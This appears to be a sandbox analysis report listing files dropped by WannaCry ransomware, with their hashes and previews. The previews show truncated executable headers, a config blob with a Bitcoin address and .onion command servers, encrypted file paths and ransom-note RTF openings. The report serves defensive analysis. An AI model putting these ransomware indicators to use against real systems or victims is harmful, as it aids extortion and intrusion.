                                                                                      MD5:A12C2040F6FDDD34E7ACB42F18DD6BDC
                                                                                      SHA1:D7DB49F1A9870A4F52E1F31812938FDEA89E9444
                                                                                      SHA-256:BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
                                                                                      SHA-512:FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..y .....!..............................@n......................... .......4....@... ......................0..m)...`...4......<.......................85..................................................,g...............................text...............................`.P`.data....-..........................@.`..rdata.......@.......0..............@.`@.bss....d.... ........................`..edata..m)...0...*..................@.0@.idata...4...`...6...6..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..rsrc...<............p..............@.0..reloc..85.......6...v..............@.0B/4..................................@.@B/19.....n|... ...~..................@..B/31..................,..............@..B/45..................B..............@..B/57.....$............T..............@.0B/70....."............\..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3098624
                                                                                      Entropy (8bit):6.512654975680739
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                                                      MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                                                      SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                                                      SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                                                      SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3098624
                                                                                      Entropy (8bit):6.512654975680739
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                                                      MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                                                      SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                                                      SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                                                      SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):107520
                                                                                      Entropy (8bit):6.440165833134522
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
                                                                                      MD5:FB072E9F69AFDB57179F59B512F828A4
                                                                                      SHA1:FE71B70173E46EE4E3796DB9139F77DC32D2F846
                                                                                      SHA-256:66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
                                                                                      SHA-512:9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....&...................@.....b......................... ...........@... .....................................................................................................................$................................text...d$.......&..................`.P`.data...X....@.......*..............@.0..rdata..pW...P...X...,..............@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):1440054
                                                                                      Entropy (8bit):0.3363393123555661
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                                                      MD5:C17170262312F3BE7027BC2CA825BF0C
                                                                                      SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                                                      SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                                                      SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):780
                                                                                      Entropy (8bit):2.3909390512430853
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:ca+IQoKvbHaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:cDdHaRVcKKfm2MYS3sUQqGLGeTEV
                                                                                      MD5:430F73F7B4B38626A47C8E99D690A89C
                                                                                      SHA1:CD59003CA8BE8235E9E1137EB5A4A965D94A60C1
                                                                                      SHA-256:C11A80899694D4809856E6547E1F9975838A5C6ABA358731823C5F0A84069608
                                                                                      SHA-512:96CF26EC08D602691447BDC93544447B82E8494175D18CFC7EAFDFEC2E23A0B2E3DA858D2FDF710EC5801A5D820A7E5F69D3F1A8C13FF645B114567C640AD02E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...............................................................................................................e...........C......................................................12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):393
                                                                                      Entropy (8bit):5.242695755528431
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:owUbJIOF676XhpUHZ6TJ1BWWOTNYeVhijq:owUb+OF6IXUHZ6T/wNYeV0jq
                                                                                      MD5:1BC70BEC431DD75CD1D39ACF211B5BFF
                                                                                      SHA1:B3AFE09766A5237304354F93C4C90B00635B2CE0
                                                                                      SHA-256:C3B03C33FA36080825C7E0386E7DC6841F75DD8E33EFA1236657214CC01E6E2B
                                                                                      SHA-512:BA20C9DDB3F26198527380517C70E8B49A1421341417C3E209F0171BCAB8A479A61AD5F3F5FC425611BC9F5A8F99493301FB0F66264CDD58669C8B39151E1444
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRY..C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png.WNCRY..C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db.WNCRY..
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):277
                                                                                      Entropy (8bit):5.0406530364854705
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:e+hvbRN23ff8xV3OgJSoPRN23ff8xV3OSK2Fv:e+hO+5G+2M
                                                                                      MD5:80CFDC583A3CEE1E4754EE6929005D80
                                                                                      SHA1:4C7DB98D0592C09EB301C2804441561CC6E5E6B7
                                                                                      SHA-256:84489722F240BA2E1C0BF62F78A11376F75ACD5D3815D3CB3F50EE8E6B5AEF9D
                                                                                      SHA-512:68250B4A27AB407AEE107EF448ED96EB6F9CA604FBA3B83419A343B006C5985909D04E38E05B1D292191F613CE49F62AC207B4F5E70DF83AAD6BC89858DCF2B2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe"..om.Save..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):47879
                                                                                      Entropy (8bit):4.950611667526586
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
                                                                                      MD5:95673B0F968C0F55B32204361940D184
                                                                                      SHA1:81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
                                                                                      SHA-256:40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
                                                                                      SHA-512:7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):54359
                                                                                      Entropy (8bit):5.015093444540877
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
                                                                                      MD5:0252D45CA21C8E43C9742285C48E91AD
                                                                                      SHA1:5C14551D2736EEF3A1C1970CC492206E531703C1
                                                                                      SHA-256:845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
                                                                                      SHA-512:1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}@\'b9\'d9\'c5\'c1;}..{\f45\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}@MingLiU;}{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}..{\f54\fbidi \fmodern\fchar
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):79346
                                                                                      Entropy (8bit):4.901891087442577
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
                                                                                      MD5:2EFC3690D67CD073A9406A25005F7CEA
                                                                                      SHA1:52C07F98870EABACE6EC370B7EB562751E8067E9
                                                                                      SHA-256:5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
                                                                                      SHA-512:0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):39070
                                                                                      Entropy (8bit):5.03796878472628
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdb2YG2+d18Scgn8c8/868H1F8E8/8Z3m8VdAm86a8n:Shef3jHd3G2n+p/mZrS14A
                                                                                      MD5:17194003FA70CE477326CE2F6DEEB270
                                                                                      SHA1:E325988F68D327743926EA317ABB9882F347FA73
                                                                                      SHA-256:3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
                                                                                      SHA-512:DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):40512
                                                                                      Entropy (8bit):5.035949134693175
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2yG2gv8n8+8zfB8k8F8i8k1Z8M8I818E838C8A8s:Shef3jHd2G26nyMZrS14g
                                                                                      MD5:537EFEECDFA94CC421E58FD82A58BA9E
                                                                                      SHA1:3609456E16BC16BA447979F3AA69221290EC17D0
                                                                                      SHA-256:5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
                                                                                      SHA-512:E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):37045
                                                                                      Entropy (8bit):5.028683023706024
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHd02wG2roqni2Jeo75Y3kmA31dv61QyU:Shef3jHd4G2M5bZrS14Q
                                                                                      MD5:2C5A3B81D5C4715B7BEA01033367FCB5
                                                                                      SHA1:B548B45DA8463E17199DAAFD34C23591F94E82CD
                                                                                      SHA-256:A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
                                                                                      SHA-512:490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):36987
                                                                                      Entropy (8bit):5.036160205965849
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdp2oG2/CzhReo75Y3kmA31dv61Qyz:Sw3BHSWjHdBG2/UhsZrS14f
                                                                                      MD5:7A8D499407C6A647C03C4471A67EAAD7
                                                                                      SHA1:D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
                                                                                      SHA-256:2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
                                                                                      SHA-512:608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):36973
                                                                                      Entropy (8bit):5.040611616416892
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:S93BHSj2cguALeT+sPzy3EFHjHdM2EG2YLC7O3eo75Y3kmA31dv61QyW:S93BHSTjHd0G2YLCZrS14y
                                                                                      MD5:FE68C2DC0D2419B38F44D83F2FCF232E
                                                                                      SHA1:6C6E49949957215AA2F3DFB72207D249ADF36283
                                                                                      SHA-256:26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
                                                                                      SHA-512:941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
                                                                                      Malicious:false
                                                                                      Reputation:low
